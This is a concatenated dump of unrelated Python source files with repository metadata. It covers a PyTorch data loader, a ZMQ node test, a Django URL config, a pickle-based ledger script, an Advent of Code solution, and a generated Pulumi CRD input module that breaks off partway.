def __init__(self, index_data: List[Tuple[List[int], List[int]]]):
self.index_data = index_data
def __getitem__(self, i):
contexts = torch.LongTensor(self.index_data[i][0])
inputs = torch.LongTensor(self.index_data[i][1][:-1])
targets = torch.LongTensor(self.index_data[i][1][1:])
return contexts, inputs, targets
def __len__(self):
return len(self.index_data)
def ctxlm_collate_fn(batch):
    # first, transpose the batch format:
    # batch[0]: Contexts
    # batch[1]: Inputs
    # batch[2]: Targets
batch = list(zip(*batch))
ctx_lengths = torch.LongTensor([len(x) for x in batch[0]])
inp_lengths = torch.LongTensor([len(x) for x in batch[1]])
contexts = nn.utils.rnn.pad_sequence(batch[0], batch_first=True)
inputs = nn.utils.rnn.pad_sequence(batch[1], batch_first=True)
targets = nn.utils.rnn.pad_sequence(batch[2], batch_first=True)
mask = (targets != 0).float()
return contexts, inputs, targets, ctx_lengths, inp_lengths, mask
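# Minimal usage sketch (illustrative; the data directory and batch size are
# assumptions, not part of this module):
#     corpus = SentCorpus(Path('data'))
#     dataset = NegSampleDataSet(corpus.train_data, corpus.word_freqs, n_negs=20)
#     loader = torch.utils.data.DataLoader(
#         dataset, batch_size=32, shuffle=True, collate_fn=neglm_collate_fn)
#     inputs, poss, negs, lengths, mask = next(iter(loader))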
|
[
"315135833@qq.com"
] |
315135833@qq.com
|
d85e8d89a929f0e2acec6b0095ee30e829f41f19
|
ceb2a3d736e0c187eb67b064697409e919660e5a
|
/qa/rpc-tests/zmq_test.py
|
0ad942eb848fbf6240163caf257a630cf6ab822a
|
[
"MIT"
] |
permissive
|
ARMROfficial/armr
|
6405117c8ad936985ff71397a9dc0e65d37c1357
|
6bc69a9dcb3ae6b26de435c1906681b3a7dd4ad4
|
refs/heads/master
| 2021-06-11T05:30:08.314912
| 2020-01-24T03:45:33
| 2020-01-24T03:45:33
| 128,578,630
| 4
| 5
|
MIT
| 2020-01-21T21:12:19
| 2018-04-07T23:57:59
|
C
|
UTF-8
|
Python
| false
| false
| 2,579
|
py
|
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test ZMQ interface
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import zmq
import struct
import http.client
import urllib.parse
class ZMQTest(BitcoinTestFramework):
port = 28332
def setup_nodes(self):
self.zmqContext = zmq.Context()
self.zmqSubSocket = self.zmqContext.socket(zmq.SUB)
self.zmqSubSocket.setsockopt(zmq.SUBSCRIBE, b"hashblock")
self.zmqSubSocket.setsockopt(zmq.SUBSCRIBE, b"hashtx")
self.zmqSubSocket.connect("tcp://127.0.0.1:%i" % self.port)
return start_nodes(4, self.options.tmpdir, extra_args=[
['-zmqpubhashtx=tcp://127.0.0.1:'+str(self.port), '-zmqpubhashblock=tcp://127.0.0.1:'+str(self.port)],
[],
[],
[]
])
def run_test(self):
self.sync_all()
genhashes = self.nodes[0].generate(1)
self.sync_all()
print("listen...")
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
blkhash = bytes_to_hex_str(body)
assert_equal(genhashes[0], blkhash) #blockhash from generate must be equal to the hash received over zmq
n = 10
genhashes = self.nodes[1].generate(n)
self.sync_all()
zmqHashes = []
for x in range(0,n*2):
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
if topic == b"hashblock":
zmqHashes.append(bytes_to_hex_str(body))
for x in range(0,n):
assert_equal(genhashes[x], zmqHashes[x]) #blockhash from generate must be equal to the hash received over zmq
#test tx from a second node
hashRPC = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.0)
self.sync_all()
# now we should receive a zmq msg because the tx was broadcast
msg = self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
hashZMQ = ""
if topic == b"hashtx":
hashZMQ = bytes_to_hex_str(body)
        assert_equal(hashRPC, hashZMQ)  # txid from sendtoaddress must be equal to the hash received over zmq
if __name__ == '__main__':
    ZMQTest().main()
|
[
"info@armr.network"
] |
info@armr.network
|
e7a75c3b395dff6c3e3842c9ac8476cae17a8b18
|
d405bb83325fd67f73b1afec5ea1b9753eae1a8f
|
/blog_project/urls.py
|
30853b9685e3f49bae78daa8a641c099c04a98f7
|
[] |
no_license
|
Vanman007/Bolg_Django
|
494c3a42a6970f940a7640ea96505876fa56b3a2
|
9fa2990a8be3f93e944185b2ca7826c57059e096
|
refs/heads/master
| 2023-08-15T07:05:16.990132
| 2020-07-26T22:47:48
| 2020-07-26T22:47:48
| 281,990,047
| 0
| 0
| null | 2021-09-22T19:33:28
| 2020-07-23T15:33:25
|
Python
|
UTF-8
|
Python
| false
| false
| 908
|
py
|
"""blog_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('accounts/', include('django.contrib.auth.urls')),
path('admin/', admin.site.urls),
path('accounts/', include('accounts.urls')),
path('', include('blog.urls')),
]
|
[
"thom37q2@stud.kea.dk"
] |
thom37q2@stud.kea.dk
|
e5c406a66eeb94f75d2362486e5ffddcf2c9956f
|
c75ec82316ed5322c5844912ce9c528c24360b9f
|
/nsd1906/py02/day02/account.py
|
d2d397a56fbbf6a198d9fc229d9b508fd56841f5
|
[] |
no_license
|
MrZhangzhg/nsd2019
|
a94cde22f2e4bd648bb9e56ca63827f558f3c083
|
54f6d2c7b348a69f13ad5f38f2fbdc8207528749
|
refs/heads/master
| 2021-08-22T17:38:27.697675
| 2020-02-22T08:36:21
| 2020-02-22T08:36:21
| 183,539,489
| 21
| 24
| null | 2020-05-17T12:07:55
| 2019-04-26T02:06:16
|
HTML
|
UTF-8
|
Python
| false
| false
| 2,120
|
py
|
import os
import pickle
from time import strftime
def save(fname):
    amount = int(input('Amount: '))
    comment = input('Comment: ')
    date = strftime('%Y-%m-%d')
    # load all records from the file
    with open(fname, 'rb') as fobj:
        records = pickle.load(fobj)
    # compute the latest balance
    balance = records[-1][-2] + amount
    record = [date, amount, 0, balance, comment]
    records.append(record)
    # write the updated list back to the file
    with open(fname, 'wb') as fobj:
        pickle.dump(records, fobj)
def cost(fname):
    amount = int(input('Amount: '))
    comment = input('Comment: ')
    date = strftime('%Y-%m-%d')
    # load all records from the file
    with open(fname, 'rb') as fobj:
        records = pickle.load(fobj)
    # compute the latest balance
    balance = records[-1][-2] - amount
    record = [date, 0, amount, balance, comment]
    records.append(record)
    # write the updated list back to the file
    with open(fname, 'wb') as fobj:
        pickle.dump(records, fobj)
def query(fname):
    # load all records
    with open(fname, 'rb') as fobj:
        records = pickle.load(fobj)
    # print the header row
    print(
        '%-12s%-8s%-8s%-12s%-20s' % ('date', 'save', 'cost', 'balance', 'comment')
    )
    # print each record
for record in records:
print('%-12s%-8s%-8s%-12s%-20s' % tuple(record))
def show_menu():
cmds = {'0': save, '1': cost, '2': query}
prompt = """(0) save
(1) cost
(2) query
(3) quit
Please input your choice(0/1/2/3): """
fname = 'account.data'
init_data = [
[strftime('%Y-%m-%d'), 0, 0, 10000, 'init data']
]
    # if the file does not exist, write the initial data into it
if not os.path.exists(fname):
with open(fname, 'wb') as fobj:
pickle.dump(init_data, fobj)
while 1:
choice = input(prompt).strip()
if choice not in ['0', '1', '2', '3']:
            print('Invalid input, please try again.')
continue
if choice == '3':
print('\nBye-bye')
break
cmds[choice](fname)
if __name__ == '__main__':
show_menu()
|
[
"zhangzg@tedu.cn"
] |
zhangzg@tedu.cn
|
eb25cf75636dd11070f415590bf264ca641b7f5e
|
1821570d417029fb4385abe88f760bda6e3293bc
|
/Day8/main.py
|
6ea7e75202e127b5e616993061856b73283c38b4
|
[] |
no_license
|
d-gallagher/AdventOfCode2019
|
86ce5d6eadccc3a45b6bd10e8b6026167cc4376a
|
c15b8bd0957bab542af7c90189b7420b52052c2b
|
refs/heads/main
| 2023-01-20T23:00:15.823141
| 2020-12-01T00:20:42
| 2020-12-01T00:20:42
| 310,332,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,280
|
py
|
# test input
# 123456789012
def split_img(file, width, height):
# img = []
zeroes = []
ones = []
twos = []
onetwo = []
with open(file, "r") as infile:
while True:
# read in pixels and process
pixels = infile.read(width * height)
if not pixels:
break
zero, one, two = count_zeroes_ones_twos(pixels)
# layer = get_layer(pixels, width, height)
# #
# img.append(layer)
zeroes.append(zero)
ones.append(one)
twos.append(two)
onetwo.append(one * two)
return zeroes, ones, twos, onetwo
def get_layer(pixels, width, height):
    layer = []
    for i in range(height):
        # take the i-th run of `width` pixels as one row
        # (the original sliced pixels[:width] every time, repeating row 0)
        row = pixels[i * width:(i + 1) * width]
        layer.append(row)
    return layer
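# Illustrative check of the row slicing (using the 3x2 test input noted at the
# top of the file): get_layer('123456', 3, 2) -> ['123', '456'].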
def count_zeroes_ones_twos(pixels):
zeroes = ones = twos = 0
for idx, x in enumerate(pixels):
if x == '0':
zeroes += 1
if x == '1':
ones += 1
if x == '2':
twos += 1
return zeroes, ones, twos
zeroes, ones, twos, onetwo = split_img("input.txt", 25, 6)
min_zero = min(zeroes)
for z, o, t, ot, in zip(zeroes, ones, twos, onetwo):
if z == min_zero:
print(f'{z}, {o}, {t}, {ot}')
|
[
"jibisjib@gmail.com"
] |
jibisjib@gmail.com
|
fd87448c5d3b6d774860df0ffbf48bbac40ed2a6
|
ee6acbd5fcd0fcd16230e96a4a539de41a02c97e
|
/operators/global-load-balancer-operator/python/pulumi_pulumi_kubernetes_crds_operators_global_load_balancer_operator/redhatcop/v1alpha1/_inputs.py
|
ec8c072135f299e523e34ac2e783a59dd8b97f1f
|
[
"Apache-2.0"
] |
permissive
|
isabella232/pulumi-kubernetes-crds
|
777e78137aaf6525a44b61a02dccf91bf0d87a14
|
372c4c0182f6b899af82d6edaad521aa14f22150
|
refs/heads/master
| 2023-03-15T04:29:16.039753
| 2020-12-30T19:35:54
| 2020-12-30T19:35:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 84,115
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by crd2pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GlobalDNSRecordSpecArgs',
'GlobalDNSRecordSpecEndpointsArgs',
'GlobalDNSRecordSpecEndpointsClusterCredentialRefArgs',
'GlobalDNSRecordSpecEndpointsLoadBalancerServiceRefArgs',
'GlobalDNSRecordSpecGlobalZoneRefArgs',
'GlobalDNSRecordSpecHealthCheckArgs',
'GlobalDNSRecordSpecHealthCheckExecArgs',
'GlobalDNSRecordSpecHealthCheckHttpGetArgs',
'GlobalDNSRecordSpecHealthCheckHttpGetHttpHeadersArgs',
'GlobalDNSRecordSpecHealthCheckHttpGetPortArgs',
'GlobalDNSRecordSpecHealthCheckTcpSocketArgs',
'GlobalDNSRecordSpecHealthCheckTcpSocketPortArgs',
'GlobalDNSRecordStatusArgs',
'GlobalDNSRecordStatusConditionsArgs',
'GlobalDNSRecordStatusEndpointStatusesArgs',
'GlobalDNSRecordStatusMonitoredServiceStatusesArgs',
'GlobalDNSRecordStatusProviderStatusArgs',
'GlobalDNSRecordStatusProviderStatusRoute53Args',
'GlobalDNSZoneSpecArgs',
'GlobalDNSZoneSpecProviderArgs',
'GlobalDNSZoneSpecProviderExternalDNSArgs',
'GlobalDNSZoneSpecProviderRoute53Args',
'GlobalDNSZoneSpecProviderRoute53CredentialsSecretRefArgs',
'GlobalDNSZoneStatusArgs',
'GlobalDNSZoneStatusConditionsArgs',
'GlobalRouteDiscoverySpecArgs',
'GlobalRouteDiscoverySpecClustersArgs',
'GlobalRouteDiscoverySpecClustersClusterCredentialRefArgs',
'GlobalRouteDiscoverySpecGlobalZoneRefArgs',
'GlobalRouteDiscoverySpecRouteSelectorArgs',
'GlobalRouteDiscoverySpecRouteSelectorMatchExpressionsArgs',
'GlobalRouteDiscoveryStatusArgs',
'GlobalRouteDiscoveryStatusClusterReferenceStatusesArgs',
'GlobalRouteDiscoveryStatusConditionsArgs',
]
@pulumi.input_type
class GlobalDNSRecordSpecArgs:
def __init__(__self__, *,
global_zone_ref: pulumi.Input['GlobalDNSRecordSpecGlobalZoneRefArgs'],
load_balancing_policy: pulumi.Input[str],
name: pulumi.Input[str],
endpoints: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecEndpointsArgs']]]] = None,
health_check: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckArgs']] = None,
ttl: Optional[pulumi.Input[int]] = None):
"""
GlobalDNSRecordSpec defines the desired state of GlobalDNSRecord
:param pulumi.Input['GlobalDNSRecordSpecGlobalZoneRefArgs'] global_zone_ref: GlobalZoneRef represents the global zone that will be used to host this record
:param pulumi.Input[str] load_balancing_policy: LoadBalancingPolicy describes the policy used to loadbalance the results of the DNS queries.
:param pulumi.Input[str] name: Name is the fqdn that will be used for this record.
        :param pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecEndpointsArgs']]] endpoints: Endpoints is the list of the cluster endpoints that need to be considered for this dns record
:param pulumi.Input['GlobalDNSRecordSpecHealthCheckArgs'] health_check: Probe is the health check used to probe the health of the applications and decide which IPs to return Only HttpAction is supported
:param pulumi.Input[int] ttl: TTL is the TTL for this dns record kubebuilder:default:60
"""
pulumi.set(__self__, "global_zone_ref", global_zone_ref)
pulumi.set(__self__, "load_balancing_policy", load_balancing_policy)
pulumi.set(__self__, "name", name)
if endpoints is not None:
pulumi.set(__self__, "endpoints", endpoints)
if health_check is not None:
pulumi.set(__self__, "health_check", health_check)
if ttl is not None:
pulumi.set(__self__, "ttl", ttl)
@property
@pulumi.getter(name="globalZoneRef")
def global_zone_ref(self) -> pulumi.Input['GlobalDNSRecordSpecGlobalZoneRefArgs']:
"""
GlobalZoneRef represents the global zone that will be used to host this record
"""
return pulumi.get(self, "global_zone_ref")
@global_zone_ref.setter
def global_zone_ref(self, value: pulumi.Input['GlobalDNSRecordSpecGlobalZoneRefArgs']):
pulumi.set(self, "global_zone_ref", value)
@property
@pulumi.getter(name="loadBalancingPolicy")
def load_balancing_policy(self) -> pulumi.Input[str]:
"""
LoadBalancingPolicy describes the policy used to loadbalance the results of the DNS queries.
"""
return pulumi.get(self, "load_balancing_policy")
@load_balancing_policy.setter
def load_balancing_policy(self, value: pulumi.Input[str]):
pulumi.set(self, "load_balancing_policy", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name is the fqdn that will be used for this record.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def endpoints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecEndpointsArgs']]]]:
"""
        Endpoints is the list of the cluster endpoints that need to be considered for this dns record
"""
return pulumi.get(self, "endpoints")
@endpoints.setter
def endpoints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecEndpointsArgs']]]]):
pulumi.set(self, "endpoints", value)
@property
@pulumi.getter(name="healthCheck")
def health_check(self) -> Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckArgs']]:
"""
Probe is the health check used to probe the health of the applications and decide which IPs to return Only HttpAction is supported
"""
return pulumi.get(self, "health_check")
@health_check.setter
def health_check(self, value: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckArgs']]):
pulumi.set(self, "health_check", value)
@property
@pulumi.getter
def ttl(self) -> Optional[pulumi.Input[int]]:
"""
TTL is the TTL for this dns record kubebuilder:default:60
"""
return pulumi.get(self, "ttl")
@ttl.setter
def ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ttl", value)
@pulumi.input_type
class GlobalDNSRecordSpecEndpointsArgs:
def __init__(__self__, *,
cluster_credential_ref: pulumi.Input['GlobalDNSRecordSpecEndpointsClusterCredentialRefArgs'],
cluster_name: pulumi.Input[str],
load_balancer_service_ref: pulumi.Input['GlobalDNSRecordSpecEndpointsLoadBalancerServiceRefArgs']):
"""
Endpoint represents a traffic ingress point to the cluster. Currently only LoadBalancer service is supported.
:param pulumi.Input['GlobalDNSRecordSpecEndpointsClusterCredentialRefArgs'] cluster_credential_ref: CredentialsSecretRef is a reference to a secret containing the credentials to access the cluster a key called "kubeconfig" containing a valid kubeconfig file for connecting to the cluster must exist in this secret.
:param pulumi.Input[str] cluster_name: ClusterName name of the cluster to connect to.
:param pulumi.Input['GlobalDNSRecordSpecEndpointsLoadBalancerServiceRefArgs'] load_balancer_service_ref: LoadBalancerServiceRef contains a reference to the load balancer service that will receive the traffic, if using a router, put here the service created by the ingress controller.
"""
pulumi.set(__self__, "cluster_credential_ref", cluster_credential_ref)
pulumi.set(__self__, "cluster_name", cluster_name)
pulumi.set(__self__, "load_balancer_service_ref", load_balancer_service_ref)
@property
@pulumi.getter(name="clusterCredentialRef")
def cluster_credential_ref(self) -> pulumi.Input['GlobalDNSRecordSpecEndpointsClusterCredentialRefArgs']:
"""
CredentialsSecretRef is a reference to a secret containing the credentials to access the cluster a key called "kubeconfig" containing a valid kubeconfig file for connecting to the cluster must exist in this secret.
"""
return pulumi.get(self, "cluster_credential_ref")
@cluster_credential_ref.setter
def cluster_credential_ref(self, value: pulumi.Input['GlobalDNSRecordSpecEndpointsClusterCredentialRefArgs']):
pulumi.set(self, "cluster_credential_ref", value)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> pulumi.Input[str]:
"""
ClusterName name of the cluster to connect to.
"""
return pulumi.get(self, "cluster_name")
@cluster_name.setter
def cluster_name(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster_name", value)
@property
@pulumi.getter(name="loadBalancerServiceRef")
def load_balancer_service_ref(self) -> pulumi.Input['GlobalDNSRecordSpecEndpointsLoadBalancerServiceRefArgs']:
"""
LoadBalancerServiceRef contains a reference to the load balancer service that will receive the traffic, if using a router, put here the service created by the ingress controller.
"""
return pulumi.get(self, "load_balancer_service_ref")
@load_balancer_service_ref.setter
def load_balancer_service_ref(self, value: pulumi.Input['GlobalDNSRecordSpecEndpointsLoadBalancerServiceRefArgs']):
pulumi.set(self, "load_balancer_service_ref", value)
@pulumi.input_type
class GlobalDNSRecordSpecEndpointsClusterCredentialRefArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
namespace: pulumi.Input[str]):
"""
CredentialsSecretRef is a reference to a secret containing the credentials to access the cluster a key called "kubeconfig" containing a valid kubeconfig file for connecting to the cluster must exist in this secret.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@pulumi.input_type
class GlobalDNSRecordSpecEndpointsLoadBalancerServiceRefArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
namespace: pulumi.Input[str]):
"""
LoadBalancerServiceRef contains a reference to the load balancer service that will receive the traffic, if using a router, put here the service created by the ingress controller.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@pulumi.input_type
class GlobalDNSRecordSpecGlobalZoneRefArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None):
"""
GlobalZoneRef represents the global zone that will be used to host this record
:param pulumi.Input[str] name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckArgs:
def __init__(__self__, *,
exec_: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckExecArgs']] = None,
failure_threshold: Optional[pulumi.Input[int]] = None,
http_get: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetArgs']] = None,
initial_delay_seconds: Optional[pulumi.Input[int]] = None,
period_seconds: Optional[pulumi.Input[int]] = None,
success_threshold: Optional[pulumi.Input[int]] = None,
tcp_socket: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketArgs']] = None,
timeout_seconds: Optional[pulumi.Input[int]] = None):
"""
Probe is the health check used to probe the health of the applications and decide which IPs to return Only HttpAction is supported
:param pulumi.Input['GlobalDNSRecordSpecHealthCheckExecArgs'] exec_: One and only one of the following should be specified. Exec specifies the action to take.
:param pulumi.Input[int] failure_threshold: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1.
:param pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetArgs'] http_get: HTTPGet specifies the http request to perform.
:param pulumi.Input[int] initial_delay_seconds: Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes
:param pulumi.Input[int] period_seconds: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1.
:param pulumi.Input[int] success_threshold: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1.
:param pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketArgs'] tcp_socket: TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook
:param pulumi.Input[int] timeout_seconds: Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes
"""
if exec_ is not None:
pulumi.set(__self__, "exec_", exec_)
if failure_threshold is not None:
pulumi.set(__self__, "failure_threshold", failure_threshold)
if http_get is not None:
pulumi.set(__self__, "http_get", http_get)
if initial_delay_seconds is not None:
pulumi.set(__self__, "initial_delay_seconds", initial_delay_seconds)
if period_seconds is not None:
pulumi.set(__self__, "period_seconds", period_seconds)
if success_threshold is not None:
pulumi.set(__self__, "success_threshold", success_threshold)
if tcp_socket is not None:
pulumi.set(__self__, "tcp_socket", tcp_socket)
if timeout_seconds is not None:
pulumi.set(__self__, "timeout_seconds", timeout_seconds)
@property
@pulumi.getter(name="exec")
def exec_(self) -> Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckExecArgs']]:
"""
One and only one of the following should be specified. Exec specifies the action to take.
"""
return pulumi.get(self, "exec_")
@exec_.setter
def exec_(self, value: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckExecArgs']]):
pulumi.set(self, "exec_", value)
@property
@pulumi.getter(name="failureThreshold")
def failure_threshold(self) -> Optional[pulumi.Input[int]]:
"""
Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1.
"""
return pulumi.get(self, "failure_threshold")
@failure_threshold.setter
def failure_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failure_threshold", value)
@property
@pulumi.getter(name="httpGet")
def http_get(self) -> Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetArgs']]:
"""
HTTPGet specifies the http request to perform.
"""
return pulumi.get(self, "http_get")
@http_get.setter
def http_get(self, value: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetArgs']]):
pulumi.set(self, "http_get", value)
@property
@pulumi.getter(name="initialDelaySeconds")
def initial_delay_seconds(self) -> Optional[pulumi.Input[int]]:
"""
Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes
"""
return pulumi.get(self, "initial_delay_seconds")
@initial_delay_seconds.setter
def initial_delay_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "initial_delay_seconds", value)
@property
@pulumi.getter(name="periodSeconds")
def period_seconds(self) -> Optional[pulumi.Input[int]]:
"""
How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1.
"""
return pulumi.get(self, "period_seconds")
@period_seconds.setter
def period_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period_seconds", value)
@property
@pulumi.getter(name="successThreshold")
def success_threshold(self) -> Optional[pulumi.Input[int]]:
"""
Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1.
"""
return pulumi.get(self, "success_threshold")
@success_threshold.setter
def success_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "success_threshold", value)
@property
@pulumi.getter(name="tcpSocket")
def tcp_socket(self) -> Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketArgs']]:
"""
TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook
"""
return pulumi.get(self, "tcp_socket")
@tcp_socket.setter
def tcp_socket(self, value: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketArgs']]):
pulumi.set(self, "tcp_socket", value)
@property
@pulumi.getter(name="timeoutSeconds")
def timeout_seconds(self) -> Optional[pulumi.Input[int]]:
"""
Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes
"""
return pulumi.get(self, "timeout_seconds")
@timeout_seconds.setter
def timeout_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "timeout_seconds", value)
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckExecArgs:
def __init__(__self__, *,
command: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
One and only one of the following should be specified. Exec specifies the action to take.
:param pulumi.Input[Sequence[pulumi.Input[str]]] command: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy.
"""
if command is not None:
pulumi.set(__self__, "command", command)
@property
@pulumi.getter
def command(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy.
"""
return pulumi.get(self, "command")
@command.setter
def command(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "command", value)
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckHttpGetArgs:
def __init__(__self__, *,
port: pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetPortArgs'],
host: Optional[pulumi.Input[str]] = None,
http_headers: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetHttpHeadersArgs']]]] = None,
path: Optional[pulumi.Input[str]] = None,
scheme: Optional[pulumi.Input[str]] = None):
"""
HTTPGet specifies the http request to perform.
:param pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetPortArgs'] port: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME.
:param pulumi.Input[str] host: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead.
:param pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetHttpHeadersArgs']]] http_headers: Custom headers to set in the request. HTTP allows repeated headers.
:param pulumi.Input[str] path: Path to access on the HTTP server.
:param pulumi.Input[str] scheme: Scheme to use for connecting to the host. Defaults to HTTP.
"""
pulumi.set(__self__, "port", port)
if host is not None:
pulumi.set(__self__, "host", host)
if http_headers is not None:
pulumi.set(__self__, "http_headers", http_headers)
if path is not None:
pulumi.set(__self__, "path", path)
if scheme is not None:
pulumi.set(__self__, "scheme", scheme)
@property
@pulumi.getter
def port(self) -> pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetPortArgs']:
"""
Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetPortArgs']):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter(name="httpHeaders")
